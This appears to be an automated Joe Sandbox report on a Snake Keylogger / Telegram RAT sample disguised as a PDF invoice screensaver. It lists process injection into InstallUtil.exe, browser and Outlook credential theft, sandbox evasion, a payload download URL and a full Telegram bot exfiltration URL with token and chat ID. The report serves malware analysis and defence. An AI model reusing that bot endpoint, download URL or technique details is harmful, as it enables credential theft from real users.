                Source: InstallUtil.exe, 00000003.00000002.3287740367.00000000028D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $sqEmultipart/form-data; boundary=------------------------8dd3605c888a16e
                Source: InstallUtil.exe, 00000003.00000002.3287740367.0000000002BB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $sqEmultipart/form-data; boundary=------------------------8dd36918bf46dcd<
                Source: InstallUtil.exe, 00000003.00000002.3287740367.00000000028D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $sqEmultipart/form-data; boundary=------------------------8dd35b104214840
                Source: InstallUtil.exe, 00000003.00000002.3287740367.000000000290E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $sqEmultipart/form-data; boundary=------------------------8dd36f26cf37706<
                Source: InstallUtil.exe, 00000003.00000002.3287740367.000000000290E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $sqEmultipart/form-data; boundary=------------------------8dd3ca360ff424e<
                Source: InstallUtil.exe, 00000003.00000002.3287740367.000000000290E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $sqEmultipart/form-data; boundary=------------------------8dd3d7b19d7036b<
                Source: FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe, 00000000.00000002.2208812518.0000000002C41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft|VMWare|Virtual
                Source: InstallUtil.exe, 00000003.00000002.3287740367.000000000290E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $sqEmultipart/form-data; boundary=------------------------8dd3831ced81ec7<
                Source: InstallUtil.exe, 00000003.00000002.3287740367.00000000028D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $sqEmultipart/form-data; boundary=------------------------8dd361a3a658359
                Source: InstallUtil.exe, 00000003.00000002.3287740367.000000000280B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $sqEmultipart/form-data; boundary=------------------------8dd352ed47400c7
                Source: InstallUtil.exe, 00000003.00000002.3287740367.000000000290E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $sqEmultipart/form-data; boundary=------------------------8dd37db59945392<
                Source: InstallUtil.exe, 00000003.00000002.3287740367.000000000290E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $sqEmultipart/form-data; boundary=------------------------8dd3a9ad859f284<
                Source: InstallUtil.exe, 00000003.00000002.3287740367.000000000290E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $sqEmultipart/form-data; boundary=------------------------8dd395f6e41e0ec<
                Source: InstallUtil.exe, 00000003.00000002.3287740367.000000000290E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $sqEmultipart/form-data; boundary=------------------------8dd3b2d0b6cb5dd<
                Source: InstallUtil.exe, 00000003.00000002.3287740367.000000000290E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $sqEmultipart/form-data; boundary=------------------------8dd3bbb3d171aee<
                Source: InstallUtil.exe, 00000003.00000002.3287740367.000000000290E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $sqEmultipart/form-data; boundary=------------------------8dd3cff5f9205ea<
                Source: InstallUtil.exe, 00000003.00000002.3287740367.0000000002AFD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $sqEmultipart/form-data; boundary=------------------------8dd35b104214840<
                Source: InstallUtil.exe, 00000003.00000002.3287740367.000000000290E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $sqEmultipart/form-data; boundary=------------------------8dd366a55c94994
                Source: InstallUtil.exe, 00000003.00000002.3287740367.000000000290E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $sqEmultipart/form-data; boundary=------------------------8dd379862e661cd<
                Source: InstallUtil.exe, 00000003.00000002.3285851812.0000000000988000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: InstallUtil.exe, 00000003.00000002.3287740367.0000000002BB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $sqEmultipart/form-data; boundary=------------------------8dd366a55c94994<
                Source: InstallUtil.exe, 00000003.00000002.3287740367.00000000028D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $sqEmultipart/form-data; boundary=------------------------8dd35f14da71486
                Source: InstallUtil.exe, 00000003.00000002.3287740367.0000000002AFD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $sqEmultipart/form-data; boundary=------------------------8dd35de11d54d03<
                Source: InstallUtil.exe, 00000003.00000002.3287740367.000000000290E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $sqEmultipart/form-data; boundary=------------------------8dd37b9e640e973<
                Source: InstallUtil.exe, 00000003.00000002.3287740367.0000000002AFD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $sqEmultipart/form-data; boundary=------------------------8dd35cea4e5824e<
                Source: FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe, 00000000.00000002.2208256316.0000000000EB4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll{
                Source: InstallUtil.exe, 00000003.00000002.3287740367.0000000002AC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $sqEmultipart/form-data; boundary=------------------------8dd3590af61b331<
                Source: InstallUtil.exe, 00000003.00000002.3287740367.000000000290E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $sqEmultipart/form-data; boundary=------------------------8dd370f3da9de1d<
                Source: InstallUtil.exe, 00000003.00000002.3287740367.00000000028A2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $sqEmultipart/form-data; boundary=------------------------8dd359eed3caaec
                Source: InstallUtil.exe, 00000003.00000002.3287740367.0000000002AC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $sqEmultipart/form-data; boundary=------------------------8dd359eed3caaec<
                Source: InstallUtil.exe, 00000003.00000002.3287740367.00000000028A2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $sqEmultipart/form-data; boundary=------------------------8dd3574202d1378
                Source: InstallUtil.exe, 00000003.00000002.3287740367.000000000290E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $sqEmultipart/form-data; boundary=------------------------8dd377099791370<
                Source: InstallUtil.exe, 00000003.00000002.3287740367.00000000027D4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $sqEmultipart/form-data; boundary=------------------------8dd34bb765112f8
                Source: InstallUtil.exe, 00000003.00000002.3287740367.000000000290E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $sqEmultipart/form-data; boundary=------------------------8dd374ef5ec923c<
                Source: InstallUtil.exe, 00000003.00000002.3287740367.000000000280B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $sqEmultipart/form-data; boundary=------------------------8dd3538067b6556
                Source: InstallUtil.exe, 00000003.00000002.3287740367.0000000002AFD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $sqEmultipart/form-data; boundary=------------------------8dd361a3a658359<
                Source: InstallUtil.exe, 00000003.00000002.3287740367.00000000028D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $sqEmultipart/form-data; boundary=------------------------8dd36560933a967
                Source: InstallUtil.exe, 00000003.00000002.3287740367.000000000290E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $sqEmultipart/form-data; boundary=------------------------8dd39aa76d1b34f<
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 360000 value starts with: 4D5AJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 360000Jump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 362000Jump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 382000Jump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 384000Jump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 53C008Jump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeQueries volume information: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected Snake Keylogger
                Source: Yara matchFile source: 3.2.InstallUtil.exe.360000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe.3ce01d0.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe.3ce01d0.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe.3c919b0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.3287740367.00000000027D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3285551020.0000000000362000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3287740367.0000000002701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2217796387.0000000003C91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe PID: 2924, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5148, type: MEMORYSTR
                Yara detected Telegram RAT
                Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5148, type: MEMORYSTR
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected Snake Keylogger
                Source: Yara matchFile source: 3.2.InstallUtil.exe.360000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe.3ce01d0.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe.3ce01d0.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe.3c919b0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.3287740367.00000000027D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3285551020.0000000000362000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3287740367.0000000002701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2217796387.0000000003C91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe PID: 2924, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5148, type: MEMORYSTR
                Yara detected Telegram RAT
                Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5148, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading                		211
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		11
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Web Service                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                DLL Side-Loading                		1
                Disable or Modify Tools                		LSASS Memory1
                Process Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		11
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
                Virtualization/Sandbox Evasion                		Security Account Manager31
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		1
                Ingress Tool Transfer                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook211
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture3
                Non-Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                Obfuscated Files or Information                		LSA Secrets1
                System Network Configuration Discovery                		SSHKeylogging14
                Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading                		Cached Domain Credentials13
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1589957 Sample: FA_35_01_2025_STA_Wz#U00f3r... Startdate: 13/01/2025 Architecture: WINDOWS Score: 100 15 reallyfreegeoip.org 2->15 17 api.telegram.org 2->17 19 2 other IPs or domains 2->19 29 Suricata IDS alerts for network traffic 2->29 31 Found malware configuration 2->31 33 Malicious sample detected (through community Yara rule) 2->33 39 9 other signatures 2->39 7 FA_35_01_2025_STA_Wz#U00f3r_standard_pdf                                             .scr.exe 15 2 2->7         started        signatures3 35 Tries to detect the country of the analysis system (by using the IP) 15->35 37 Uses the Telegram API (likely for C&C communication) 17->37 process4 dnsIp5 21 160.22.121.182, 49704, 80 SIPL-ASSysconInfowayPvtLtdIN unknown 7->21 41 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 7->41 43 Writes to foreign memory regions 7->43 45 Injects a PE file into a foreign processes 7->45 11 InstallUtil.exe 14 2 7->11         started        signatures6 process7 dnsIp8 23 api.telegram.org 149.154.167.220, 443, 49990, 49994 TELEGRAMRU United Kingdom 11->23 25 checkip.dyndns.com 158.101.44.242, 49708, 49816, 49879 ORACLE-BMC-31898US United States 11->25 27 reallyfreegeoip.org 104.21.80.1, 443, 49804, 49810 CLOUDFLARENETUS United States 11->27 47 Tries to steal Mail credentials (via file / registry access) 11->47 49 Tries to harvest and steal browser information (history, passwords, etc) 11->49 signatures9

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://160.22.121.1820%Avira URL Cloudsafe
                https://api.telegram.orgL0%Avira URL Cloudsafe
                http://160.22.121.182/STATO/Tllgzvbkww.vdf0%Avira URL Cloudsafe
                http://160.22.121.182/STATO/Tllgzvbkww.vdfUThe0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                reallyfreegeoip.org
                		104.21.80.1
                		truefalse
                  		high
                  api.telegram.org
                  		149.154.167.220
                  		truefalse
                    		high
                    checkip.dyndns.com
                    		158.101.44.242
                    		truefalse
                      		high
                      checkip.dyndns.org
                      		unknown
                      		unknownfalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://checkip.dyndns.org/false
                          		high
                          https://reallyfreegeoip.org/xml/8.46.123.189false
                            		high
                            https://api.telegram.org/bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snakefalse
                              		high
                              http://160.22.121.182/STATO/Tllgzvbkww.vdffalse
                              • Avira URL Cloud: safe
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://api.telegram.org/bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018InstallUtil.exe, 00000003.00000002.3287740367.0000000002AFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://github.com/mgravell/protobuf-netiFA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe, 00000000.00000002.2221960975.00000000066F0000.00000004.08000000.00040000.00000000.sdmpfalse
                                  		high
                                  https://stackoverflow.com/q/14436606/23354FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe, 00000000.00000002.2208812518.0000000002C41000.00000004.00000800.00020000.00000000.sdmp, FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe, 00000000.00000002.2221960975.00000000066F0000.00000004.08000000.00040000.00000000.sdmpfalse
                                    		high
                                    https://api.telegram.orgInstallUtil.exe, 00000003.00000002.3287740367.00000000028D8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3287740367.000000000290E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3287740367.00000000028A2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3287740367.00000000027D4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3287740367.0000000002BB4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3287740367.000000000280B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3287740367.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3287740367.0000000002AFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://github.com/mgravell/protobuf-netJFA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe, 00000000.00000002.2221960975.00000000066F0000.00000004.08000000.00040000.00000000.sdmpfalse
                                        		high
                                        https://api.telegram.org/botInstallUtil.exe, 00000003.00000002.3287740367.0000000002AFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://stackoverflow.com/q/11564914/23354;FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe, 00000000.00000002.2221960975.00000000066F0000.00000004.08000000.00040000.00000000.sdmpfalse
                                            		high
                                            https://stackoverflow.com/q/2152978/23354FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe, 00000000.00000002.2221960975.00000000066F0000.00000004.08000000.00040000.00000000.sdmpfalse
                                              		high
                                              http://160.22.121.182/STATO/Tllgzvbkww.vdfUTheFA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exefalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://api.telegram.orgLInstallUtil.exe, 00000003.00000002.3287740367.0000000002BB4000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://checkip.dyndns.org/qFA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe, 00000000.00000002.2217796387.0000000003C91000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3285551020.0000000000362000.00000040.00000400.00020000.00000000.sdmpfalse
                                                		high
                                                https://reallyfreegeoip.org/xml/8.46.123.189$InstallUtil.exe, 00000003.00000002.3287740367.0000000002779000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3287740367.00000000027D4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3287740367.00000000027BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://api.telegramInstallUtil.exe, 00000003.00000002.3287740367.0000000002AFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://github.com/mgravell/protobuf-netFA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe, 00000000.00000002.2221960975.00000000066F0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                      		high
                                                      https://reallyfreegeoip.orgInstallUtil.exe, 00000003.00000002.3287740367.00000000027BE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3287740367.000000000274E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://checkip.dyndns.orgInstallUtil.exe, 00000003.00000002.3287740367.0000000002701000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://160.22.121.182FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe, 00000000.00000002.2208812518.0000000002C11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://api.telegram.orgInstallUtil.exe, 00000003.00000002.3287740367.000000000290E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3287740367.0000000002BB4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3287740367.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3287740367.0000000002AFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameFA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe, 00000000.00000002.2208812518.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3287740367.0000000002701000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://reallyfreegeoip.org/xml/FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe, 00000000.00000002.2217796387.0000000003C91000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3287740367.000000000274E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3285551020.0000000000362000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                		high

                                                                World Map of Contacted IPs

                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs

                                                                Public IPs

                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                149.154.167.220
                                                                		api.telegram.orgUnited Kingdom
                                                                		62041TELEGRAMRUfalse
                                                                160.22.121.182
                                                                		unknownunknown
                                                                		45194SIPL-ASSysconInfowayPvtLtdINfalse
                                                                158.101.44.242
                                                                		checkip.dyndns.comUnited States
                                                                		31898ORACLE-BMC-31898USfalse
                                                                104.21.80.1
                                                                		reallyfreegeoip.orgUnited States
                                                                		13335CLOUDFLARENETUSfalse

                                                                General Information

                                                                Joe Sandbox version:42.0.0 Malachite
                                                                Analysis ID:1589957
                                                                Start date and time:2025-01-13 11:44:07 +01:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 6m 2s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Number of analysed new started processes analysed:5
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe
                                                                renamed because original name is a hash value
                                                                Original Sample Name:FA_35_01_2025_STA_Wzr_standard_pdf .scr.exe
                                                                Detection:MAL
                                                                Classification:mal100.troj.spyw.evad.winEXE@3/0@3/4
                                                                EGA Information:
                                                                • Successful, ratio: 50%
                                                                HCA Information:
                                                                • Successful, ratio: 96%
                                                                • Number of executed functions: 449
                                                                • Number of non-executed functions: 46
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .exe

                                                                Warnings

                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.175.87.197
                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                • Execution Graph export aborted for target InstallUtil.exe, PID 5148 because it is empty
                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
